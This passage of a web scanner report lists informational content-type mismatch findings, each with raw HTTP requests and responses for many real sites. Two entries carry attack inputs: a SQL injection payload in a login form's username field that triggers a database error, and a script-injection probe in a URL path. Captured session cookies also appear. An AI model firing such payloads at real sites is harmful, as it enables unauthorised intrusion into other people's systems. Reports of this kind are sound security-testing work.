Request

GET /shot_main_js/v6.59/ HTTP/1.1
Host: i.ixnp.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:15:08 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=31536000
Expires: Wed, 25 Apr 2012 01:15:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 98294

/* Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap.com/pri
...[SNIP]...

32.11. https://landingpage.leads.dynamicssite.com/PostLead.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://landingpage.leads.dynamicssite.com
Path:   /PostLead.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /PostLead.aspx HTTP/1.1
Host: landingpage.leads.dynamicssite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sbosSession=473982fb-74e6-4678-9919-c52e596ea5bc; path=/; HttpOnly
Set-Cookie: ClientSettings=ClientLocaleList=en~en-US&WebSource=UNKNOWN&WebDestination=UNKNOWN&WebDestinationVersion=DEFAULT; path=/; HttpOnly
Set-Cookie: Version=1.0.0.0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 26 Apr 2011 12:40:24 GMT
Connection: close

The page you requested was removed.

32.12. http://learn.bridgefront.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://learn.bridgefront.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CBB236D385A70A54A6BE4F341848EE80

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:44 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: W/"1406-1302518292000"
Last-Modified: Mon, 11 Apr 2011 10:38:12 GMT
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...................................JJJ.........eee.............WWW.ttt.........^^^.................nnn.....RRR.yyy.............iii.}}}.............MMM.......
...[SNIP]...

32.13. http://login.sisna.com/login_multiple/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

POST /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
Referer: http://login.sisna.com/login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2
Cache-Control: max-age=0
Origin: http://login.sisna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 278

username=+%27%7C%7Ccast%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2853%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:52:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 74
Connection: close
Content-Type: text/html; charset=UTF-8

Query failed: ERROR: invalid input syntax for type numeric: "_!@5dilemma"

32.14. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1843&ref2=elqNone&tzo=360&ms=640 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:46:27 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

32.15. http://pixel.intellitxt.com/pixel.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.intellitxt.com
Path:   /pixel.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1
Host: pixel.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/html
Content-Length: 1602
Date: Tue, 26 Apr 2011 14:21:08 GMT
Connection: close

(function(){try{var d=document;var u;u='http://segment-pixel.invitemedia.com/pixel?code=2773&partnerID=86&key=segment&returnType=js';if(navigator.appVersion.indexOf('MSIE')>=0 && ('complete'!=document
...[SNIP]...

32.16. http://response.firstdata.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://response.firstdata.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: response.firstdata.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:44:25 GMT
Content-Length: 35

Can not display files of this type.

32.17. http://secure.comodo.com/products/guessregion  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://secure.comodo.com
Path:   /products/guessregion

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /products/guessregion HTTP/1.1
Host: secure.comodo.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:44:23 GMT
Content-Type: text/javascript; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=5
Cache-control: max-age=-1
Expires: Mon, 02 May 2011 23:44:23 GMT
Content-Length: 60

g_region = "North America";
g_country = "US";
updatePage();

32.18. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

32.19. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js?sz=44009&lm=04/26/2011%2000%3A20%3A48&size=small&accept=shots HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:21 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199

if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; }
SNAP_COM.autoshot = {"Results":{"Matches":null
}}
;
if (SNAP_COM.shot && SNAP_COM.shot.autoshot_init) { SNAP_COM.shot.autoshot_init(true) }

32.20. http://shots.snap.com/asj/v1/spakey/1797024321/auto_shot.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /asj/v1/spakey/1797024321/auto_shot.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /asj/v1/spakey/1797024321/auto_shot.js?sz=6493&lm=04/26/2011%2001%3A47%3A33&size=large&ad_only=1&accept=shots HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782435%26created_time%3D1303782435; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:47:22 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:47:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 55

if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; }

32.21. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15220

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

32.22. https://support.sentrigo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.sentrigo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.3.10.1303780499; PHPSESSID=esjikd3cpu81nqjvdhe9ecrli0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:54 GMT
Server: Apache
Last-Modified: Sun, 10 Apr 2011 11:03:49 GMT
ETag: "2d401c-4486-69e10f40"
Accept-Ranges: bytes
Content-Length: 17542
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

32.23. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.tenable.com
Path:   /support-center/cerberus-support-center/themes/tenable/img/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /support-center/cerberus-support-center/themes/tenable/img/favicon.ico HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; CerberusPublicGUI=26ko0fk8c8q45fu689ijjmn420

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:50:13 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2010 17:38:06 GMT
ETag: "64506d-47e-536e1b80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................:F...u...[...3..|...f{..C8..e'...M...u...r...s...2... ...s...z..u......................................................................
...[SNIP]...

32.24. http://verify.authorize.net/anetseal/images/secure90x72.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:a13"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:56:02 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...

32.25. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 120

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

32.26. http://www.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; CFID=132569126; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; GEOSERVER=2; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CMAVID=none; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:10 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...

32.27. http://www.bankofamerica.com/global/images/new_Banklogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /global/images/new_Banklogo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /global/images/new_Banklogo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:01 GMT
Content-length: 24065
Content-type: image/gif
Last-modified: Sun, 25 Oct 2009 17:09:06 GMT
Etag: "5e01-4ae48632"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=524727979.20480.0000; path=/

......JFIF.....H.H....
.Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:06:30 12:19:11.........
...[SNIP]...

32.28. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

